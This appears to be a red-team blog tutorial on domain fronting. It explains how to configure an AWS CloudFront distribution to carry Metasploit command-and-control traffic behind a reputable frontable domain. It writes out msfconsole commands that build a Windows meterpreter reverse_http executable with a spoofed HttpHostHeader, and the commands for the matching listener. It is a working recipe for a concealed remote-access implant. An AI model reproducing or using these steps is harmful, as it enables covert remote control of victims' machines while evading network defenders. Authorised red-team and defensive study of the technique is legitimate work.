Domain Fronting is a technique that is typically used for censorship evasion. It relies on popular Content Delivery Networks (CDNs) such as Amazon’s CloudFront to mask traffic origins. By changing the HTTP Host header, the CDN will happily route us to the correct server. Red Teams have been using this technique for hiding C2 traffic by using high reputation redirectors.
For more information on Domain Fronting, please refer to this whitepaper
Setting up CloudFront
Log in to AWS, and navigate to CloudFront. You will need a domain name that you own, or acquired for free from a registrar like Freenom. Once you are logged into AWS, click Create Distribution. The Origin Domain Name will be the domain that you own. You also need to match origin protocol policy (HTTP/HTTPs), so that CloudFront routes both types of traffic to you.
Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little traffic as
- Allow all HTTP methods possible.
Cache Based on Selected Request Headersto All.
Forward Cookies, also select All.
Query String Forwarding and Caching, select Forward all, cache based on all.
Everything else can be left at default. Click the Create Distribution button at the bottom of the page, and wait for the setup to complete within AWS.
This may take some time for AWS to propagate the correct settings to the edge servers. Go ahead with the
meterpreter setup while this completes.
At the time of publishing, the Domain Fronting capability has not yet been pushed to the main distribution channels. Per the discussion here, Domain Fronting is only ready for certain payload types, and is not currently included in the main Metasploit framework. Rapid7 also hinted at Domain Fronting support in a recent blog.
Since this is not mainstream yet, we will need to grab the latest version from github for payload generation. The server is perfectly capable of handling Domain Fronting as the client simply needs to change the Host header in order to use the CDN as a redirector to our C2.
If you don’t already have a Metasploit development environment setup, there are excellent instructions here.
Choosing a Redirector
As we are using CloudFront for this demonstration, we can choose any popular domain that also utilizes CloudFront.
(Vincent)[https://twitter.com/vysecurity] recently released a large list of frontable domains.
For simplicity sake, I’ve chosen
abrakam.com as it’s the second domain in the CloudFront list.
Meterpreter Payload Generation
In your recently installed development environment with Metasploit, start up msfconsole.
use payload/windows/meterpreter/reverse_http set LHOST abrakam.com set LPORT 80 set HttpHostHeader d3k1m3cdd2g9qm.cloudfront.net generate -t exe -f /tmp/meterpreter
Change the HttpHostHeader to the subdomain that AWS automatically populated for you during the distribution setup
On the server that you control, also startup msfconsole.
use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 0.0.0.0 set LPORT 80 exploit
The following is a screen capture of Wireshark as the agent is connecting to our meterpreter handler. As we used the reverse_http payload, you can inspect the HTTP traffic and see that simply by changing the Host header, we were able to redirect the payload to the server of our choice.
Keep an eye out for new payloads supporting the extended HttpHost options in the
advanced settings of Metasploit.